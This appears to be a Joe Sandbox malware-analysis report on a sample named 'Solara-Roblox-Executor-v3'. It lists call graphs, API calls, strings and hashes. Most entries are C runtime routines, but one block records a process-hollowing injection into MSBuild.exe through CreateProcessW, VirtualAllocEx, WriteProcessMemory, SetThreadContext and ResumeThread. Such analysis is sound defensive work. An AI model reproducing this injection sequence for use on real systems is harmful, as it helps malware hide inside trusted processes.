EnterCriticalSection 21146->21161 21148 305eae 21162 305ecd 21148->21162 21150 305e84 21150->21148 21152 3056b7 ___free_lconv_mon 14 API calls 21150->21152 21152->21148 21153 305ed9 21154 305ee5 ___scrt_is_nonwritable_in_current_image 21153->21154 21166 301d11 EnterCriticalSection 21154->21166 21156 305eef 21157 305c11 __strnicoll 14 API calls 21156->21157 21158 305f02 21157->21158 21167 305f22 21158->21167 21161->21150 21165 301d28 LeaveCriticalSection 21162->21165 21164 305d9d 21164->21153 21165->21164 21166->21156 21170 301d28 LeaveCriticalSection 21167->21170 21169 305c03 21169->21117 21170->21169 19991 2f8af0 19992 2f8aff 19991->19992 19994 2f8b23 19992->19994 19995 30304b 19992->19995 19996 30305e _Fputc 19995->19996 19999 3030b8 19996->19999 19998 303073 _Fputc 19998->19994 20000 3030ca 19999->20000 20001 3030ed 19999->20001 20002 301ba8 _Fputc 29 API calls 20000->20002 20001->20000 20004 303114 20001->20004 20003 3030e5 20002->20003 20003->19998 20007 3031ee 20004->20007 20008 3031fa ___scrt_is_nonwritable_in_current_image 20007->20008 20015 2fd13f EnterCriticalSection 20008->20015 20010 303208 20016 30314e 20010->20016 20012 303215 20025 30323d 20012->20025 20015->20010 20017 3021e8 ___scrt_uninitialize_crt 64 API calls 20016->20017 20018 303169 20017->20018 20019 307f9d 14 API calls 20018->20019 20020 303173 20019->20020 20021 30318e 20020->20021 20022 3069f4 __strnicoll 14 API calls 20020->20022 20021->20012 20023 3031b2 20022->20023 20024 3056b7 ___free_lconv_mon 14 API calls 20023->20024 20024->20021 20028 2fd153 LeaveCriticalSection 20025->20028 20027 30314c 20027->19998 20028->20027

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00320110,00320100), ref: 00320334
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00320347
                                                                                          • Wow64GetThreadContext.KERNEL32(00000110,00000000), ref: 00320365
                                                                                          • ReadProcessMemory.KERNELBASE(0000010C,?,00320154,00000004,00000000), ref: 00320389
                                                                                          • VirtualAllocEx.KERNELBASE(0000010C,?,?,00003000,00000040), ref: 003203B4
                                                                                          • TerminateProcess.KERNELBASE(0000010C,00000000), ref: 003203D3
                                                                                          • WriteProcessMemory.KERNELBASE(0000010C,00000000,?,?,00000000,?), ref: 0032040C
                                                                                          • WriteProcessMemory.KERNELBASE(0000010C,00400000,?,?,00000000,?,00000028), ref: 00320457
                                                                                          • WriteProcessMemory.KERNELBASE(0000010C,?,?,00000004,00000000), ref: 00320495
                                                                                          • Wow64SetThreadContext.KERNEL32(00000110,02750000), ref: 003204D1
                                                                                          • ResumeThread.KERNELBASE(00000110), ref: 003204E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                          • API String ID: 2440066154-3857624555
                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction ID: 305fd8aa5df333804a0bf0fd0007672b12b645dee6af9deb3cd8ab8689f5bee8
                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction Fuzzy Hash: F0B11A7660024AAFDB60CF68CC80BDA73A5FF88714F158524EA0CAB342D770FA55CB94

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AddressCloseCreateHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2547132502-1429953656
                                                                                          • Opcode ID: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
                                                                                          • Instruction ID: bedc6e20c0689bbde8d745d213f420aa8c0adedb6f72d0820bfd4c0fdedde267
                                                                                          • Opcode Fuzzy Hash: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
                                                                                          • Instruction Fuzzy Hash: 2341B3B0D18209DFDB00EFA8D4986AEBBF0EF48354F00852DE899A7350D7759959CF92

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 41 306642-30664e 42 3066e0-3066e3 41->42 43 306653-306664 42->43 44 3066e9 42->44 46 306671-30668a LoadLibraryExW 43->46 47 306666-306669 43->47 45 3066eb-3066ef 44->45 50 3066f0-306700 46->50 51 30668c-306695 GetLastError 46->51 48 306709-30670b 47->48 49 30666f 47->49 48->45 53 3066dd 49->53 50->48 52 306702-306703 FreeLibrary 50->52 54 306697-3066a9 call 309d04 51->54 55 3066ce-3066db 51->55 52->48 53->42 54->55 58 3066ab-3066bd call 309d04 54->58 55->53 58->55 61 3066bf-3066cc LoadLibraryExW 58->61 61->50 61->55
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,9B9A4FEF,?,00306751,00000000,00000000,00000000,00000000), ref: 00306703
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
                                                                                          • Instruction ID: bd08ebe80ec6e7023f5fcdfb512efd8b01ced730dba88331c8ab5d829bd6a833
                                                                                          • Opcode Fuzzy Hash: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
                                                                                          • Instruction Fuzzy Hash: 21212732A03218ABD7339B24DC62B9A336C9B45770F270124FD11A72D5EB32ED20C6E0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressConsoleFreeHandleModuleProc
                                                                                          • String ID: FreeConsole$kernel32.dll
                                                                                          • API String ID: 1635486814-2564406000
                                                                                          • Opcode ID: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
                                                                                          • Instruction ID: 5e37eb1cb4c5440cf06a1bbe27d7e5c0606912c9c190fad6ce9ae0b106405ce5
                                                                                          • Opcode Fuzzy Hash: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
                                                                                          • Instruction Fuzzy Hash: D301B6709002089FCB01EFBCD94559DBBF8AB48300F40856AE849D7351EB34A6588F82

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 67 306e2a-306e43 68 306e45-306e55 call 2ff15d 67->68 69 306e59-306e5e 67->69 68->69 75 306e57 68->75 71 306e60-306e68 69->71 72 306e6b-306e91 call 30573f 69->72 71->72 77 307007-307018 call 2f71d1 72->77 78 306e97-306ea2 72->78 75->69 80 306ea8-306ead 78->80 81 306ffa 78->81 83 306ec6-306ed1 call 3056f1 80->83 84 306eaf-306eb8 call 2f9f70 80->84 85 306ffc 81->85 83->85 94 306ed7 83->94 84->85 92 306ebe-306ec4 84->92 86 306ffe-307005 call 2f9f07 85->86 86->77 95 306edd-306ee2 92->95 94->95 95->85 96 306ee8-306efd call 30573f 95->96 96->85 99 306f03-306f15 call 3064f3 96->99 101 306f1a-306f1e 99->101 101->85 102 306f24-306f2c 101->102 103 306f66-306f72 102->103 104 306f2e-306f33 102->104 105 306f74-306f76 103->105 106 306fef 103->106 104->86 107 306f39-306f3b 104->107 108 306f78-306f81 call 2f9f70 105->108 109 306f8b-306f96 call 3056f1 105->109 110 306ff1-306ff8 call 2f9f07 106->110 107->85 111 306f41-306f5b call 3064f3 107->111 108->110 121 306f83-306f89 108->121 109->110 122 306f98 109->122 110->85 111->86 120 306f61 111->120 120->85 123 306f9e-306fa3 121->123 122->123 123->110 124 306fa5-306fbd call 3064f3 123->124 124->110 127 306fbf-306fc6 124->127 128 306fe7-306fed 127->128 129 306fc8-306fc9 127->129 130 306fca-306fdc call 305801 128->130 129->130 130->110 133 306fde-306fe5 call 2f9f07 130->133 133->86
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00306EAF
                                                                                          • __alloca_probe_16.LIBCMT ref: 00306F78
                                                                                          • __freea.LIBCMT ref: 00306FDF
                                                                                            • Part of subcall function 003056F1: RtlAllocateHeap.NTDLL(00000000,00307675,?,?,00307675,00000220,?,?,?), ref: 00305723
                                                                                          • __freea.LIBCMT ref: 00306FF2
                                                                                          • __freea.LIBCMT ref: 00306FFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1423051803-0
                                                                                          • Opcode ID: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
                                                                                          • Instruction ID: a0a49f98b9bef3cccc85cf02c4617391e6f08627812d0c839875437a249a399e
                                                                                          • Opcode Fuzzy Hash: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
                                                                                          • Instruction Fuzzy Hash: C251C57260224BAFDB229F65DC62EBB7AADEF44750B160138FD04D6195EB31DC70CA60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 136 2f1db0-2f1e7e call 2f1000 * 2 GetProcAddress 141 2f1e8f-2f1ecb VirtualProtect 136->141 142 2f1e84-2f1e8c 136->142 144 2f1edc-2f1ef3 call 2f71d1 141->144 145 2f1ed1-2f1ed7 call 2f1bd0 141->145 142->141 145->144
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProcProtectVirtual
                                                                                          • String ID: @$VirtualProtect
                                                                                          • API String ID: 3759838892-29487290
                                                                                          • Opcode ID: 57c81c4826d25edafc79ba8029b54e2bd2c6109a000f2b4b7a56dc50433d5bb3
                                                                                          • Instruction ID: 6efb39f30c2a73682dc3d04930f98e1f595bd9538fc821bb548c1f70645aa7ba
                                                                                          • Opcode Fuzzy Hash: 57c81c4826d25edafc79ba8029b54e2bd2c6109a000f2b4b7a56dc50433d5bb3
                                                                                          • Instruction Fuzzy Hash: D941D2B0901209DFDB04DFA9D5986EEBBF4FF08354F108429E848AB351D7759949CF91

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(002FF1A0,?,002FF355,00000000,?,?,002FF1A0,9B9A4FEF,?,002FF1A0), ref: 002FF2A4
                                                                                          • TerminateProcess.KERNEL32(00000000,?,002FF355,00000000,?,?,002FF1A0,9B9A4FEF,?,002FF1A0), ref: 002FF2AB
                                                                                          • ExitProcess.KERNEL32 ref: 002FF2BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: caa51c2b9427df1eb80e1abaf65dff916434670695d7048f13905489f3d34f46
                                                                                          • Instruction ID: 139811490e6bde9d1c33011cd02ef887984e1032062f40ba453740ae486ac73b
                                                                                          • Opcode Fuzzy Hash: caa51c2b9427df1eb80e1abaf65dff916434670695d7048f13905489f3d34f46
                                                                                          • Instruction Fuzzy Hash: DAD09E3201010CABCF462F60DD0D9A97F6DEF48791B548035BE1956071CF3699619E80

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 156 30d3a4-30d3c6 157 30d5b9 156->157 158 30d3cc-30d3ce 156->158 159 30d5bb-30d5bf 157->159 160 30d3d0-30d3ef call 301ba8 158->160 161 30d3fa-30d41d 158->161 169 30d3f2-30d3f5 160->169 162 30d423-30d429 161->162 163 30d41f-30d421 161->163 162->160 165 30d42b-30d43c 162->165 163->162 163->165 167 30d43e-30d44c call 30c152 165->167 168 30d44f-30d45f call 30d6d1 165->168 167->168 174 30d461-30d467 168->174 175 30d4a8-30d4ba 168->175 169->159 178 30d490-30d4a6 call 30d74e 174->178 179 30d469-30d46c 174->179 176 30d511-30d531 WriteFile 175->176 177 30d4bc-30d4c2 175->177 180 30d533-30d539 GetLastError 176->180 181 30d53c 176->181 183 30d4c4-30d4c7 177->183 184 30d4fd-30d50a call 30db7d 177->184 194 30d489-30d48b 178->194 185 30d477-30d486 call 30db15 179->185 186 30d46e-30d471 179->186 180->181 188 30d53f-30d54a 181->188 189 30d4e9-30d4fb call 30dd41 183->189 190 30d4c9-30d4cc 183->190 201 30d50f 184->201 185->194 186->185 191 30d551-30d554 186->191 195 30d5b4-30d5b7 188->195 196 30d54c-30d54f 188->196 202 30d4e4-30d4e7 189->202 197 30d557-30d559 190->197 198 30d4d2-30d4df call 30dc58 190->198 191->197 194->188 195->159 196->191 203 30d587-30d593 197->203 204 30d55b-30d560 197->204 198->202 201->202 202->194 209 30d595-30d59b 203->209 210 30d59d-30d5af 203->210 207 30d562-30d574 204->207 208 30d579-30d582 call 3013a0 204->208 207->169 208->169 209->157 209->210 210->169
                                                                                          APIs
                                                                                            • Part of subcall function 0030D74E: GetConsoleOutputCP.KERNEL32(9B9A4FEF,00000000,00000000,?), ref: 0030D7B1
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,002FD832,?,002FDA94), ref: 0030D529
                                                                                          • GetLastError.KERNEL32(?,002FD832,?,002FDA94,?,002FDA94,?,?,?,?,?,?,?,00000000,?,?), ref: 0030D533
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                          • String ID:
                                                                                          • API String ID: 2915228174-0
                                                                                          • Opcode ID: f97a6fd32ce7d0721967298e59dd95e8fd1547f527bb299450a6504eceebf606
                                                                                          • Instruction ID: 9331f4683c3dcd755214309f45d9d626233542a9acdf8e60dc5bd1754d514d60
                                                                                          • Opcode Fuzzy Hash: f97a6fd32ce7d0721967298e59dd95e8fd1547f527bb299450a6504eceebf606
                                                                                          • Instruction Fuzzy Hash: 3D619271D01119AFDF12CFE8CC94AEEBBF9AF49318F150189E904AB296D771D901CB60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 213 3072a8-3072d0 call 3074ad 216 307495-307496 call 30751e 213->216 217 3072d6-3072dc 213->217 222 30749b-30749d 216->222 218 3072df-3072e5 217->218 220 3073e1-307400 call 2fc690 218->220 221 3072eb-3072f7 218->221 232 307403-307408 220->232 221->218 223 3072f9-3072ff 221->223 225 30749e-3074ac call 2f71d1 222->225 226 307305-307311 IsValidCodePage 223->226 227 3073d9-3073dc 223->227 226->227 231 307317-30731e 226->231 227->225 233 307340-30734d GetCPInfo 231->233 234 307320-30732c 231->234 235 307445-30744f 232->235 236 30740a-30740f 232->236 239 3073cd-3073d3 233->239 240 30734f-30736e call 2fc690 233->240 238 307330-30733b 234->238 235->232 237 307451-30747b call 3077f9 235->237 241 307411-307419 236->241 242 307442 236->242 253 30747c-30748b 237->253 244 30748d-30748e call 307837 238->244 239->216 239->227 240->238 255 307370-307377 240->255 246 30743a-307440 241->246 247 30741b-30741e 241->247 242->235 254 307493 244->254 246->236 246->242 251 307420-307426 247->251 251->246 252 307428-307438 251->252 252->246 252->251 253->244 253->253 254->222 256 3073a3-3073a6 255->256 257 307379-30737e 255->257 258 3073ab-3073b2 256->258 257->256 259 307380-307388 257->259 258->258 260 3073b4-3073c8 call 3077f9 258->260 261 30738a-307391 259->261 262 30739b-3073a1 259->262 260->238 264 307392-307399 261->264 262->256 262->257 264->262 264->264
                                                                                          APIs
                                                                                            • Part of subcall function 003074AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 003074D8
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,003076B8,?,00000000,?,?,?), ref: 00307309
                                                                                          • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,003076B8,?,00000000,?,?,?), ref: 00307345
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID:
                                                                                          • API String ID: 546120528-0
                                                                                          • Opcode ID: 9b78d9e358d19e7ea4cb75277510de0dd7652feb79432f73df4d9b8e822d4142
                                                                                          • Instruction ID: cb1cf591b4dca71ea5dd5183e71dfec8262f05940f9e5425573108e88e53467e
                                                                                          • Opcode Fuzzy Hash: 9b78d9e358d19e7ea4cb75277510de0dd7652feb79432f73df4d9b8e822d4142
                                                                                          • Instruction Fuzzy Hash: F1513670E092459EDB22CF36C8A16AAFBF9EF44300F15806ED4868B191D774B946DB80

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 266 30db7d-30dbd2 call 2fa050 269 30dbd4 266->269 270 30dc47-30dc57 call 2f71d1 266->270 272 30dbda 269->272 274 30dbe0-30dbe2 272->274 275 30dbe4-30dbe9 274->275 276 30dbfc-30dc21 WriteFile 274->276 277 30dbf2-30dbfa 275->277 278 30dbeb-30dbf1 275->278 279 30dc23-30dc2e 276->279 280 30dc3f-30dc45 GetLastError 276->280 277->274 277->276 278->277 279->270 281 30dc30-30dc3b 279->281 280->270 281->272 282 30dc3d 281->282 282->270
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0030D50F,?,002FDA94,?,?,?,00000000), ref: 0030DC19
                                                                                          • GetLastError.KERNEL32(?,0030D50F,?,002FDA94,?,?,?,00000000,?,?,?,?,?,002FD832,?,002FDA94), ref: 0030DC3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastWrite
                                                                                          • String ID:
                                                                                          • API String ID: 442123175-0
                                                                                          • Opcode ID: 591bee44b58bbc3d9cc16c3298ebdb5f7fafe2ccd99f0df5f42a1eaaa414eaee
                                                                                          • Instruction ID: 97d3ae85a1e2ac91552f72cf62a72639826679bc06680a7ceff43ac0155dc894
                                                                                          • Opcode Fuzzy Hash: 591bee44b58bbc3d9cc16c3298ebdb5f7fafe2ccd99f0df5f42a1eaaa414eaee
                                                                                          • Instruction Fuzzy Hash: BC219130A112199FDB1ACF69DC90AE9B7F9EF88305F1440A9E906D7251D730DE46CF64

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 283 307192-307197 284 307199-3071b1 283->284 285 3071b3-3071b7 284->285 286 3071bf-3071c8 284->286 285->286 287 3071b9-3071bd 285->287 288 3071da 286->288 289 3071ca-3071cd 286->289 290 307234-307238 287->290 293 3071dc-3071e9 GetStdHandle 288->293 291 3071d6-3071d8 289->291 292 3071cf-3071d4 289->292 290->284 294 30723e-307241 290->294 291->293 292->293 295 307216-307228 293->295 296 3071eb-3071ed 293->296 295->290 298 30722a-30722d 295->298 296->295 297 3071ef-3071f8 GetFileType 296->297 297->295 299 3071fa-307203 297->299 298->290 300 307205-307209 299->300 301 30720b-30720e 299->301 300->290 301->290 302 307210-307214 301->302 302->290
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00307081,0031FCD8,0000000C), ref: 003071DE
                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00307081,0031FCD8,0000000C), ref: 003071F0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
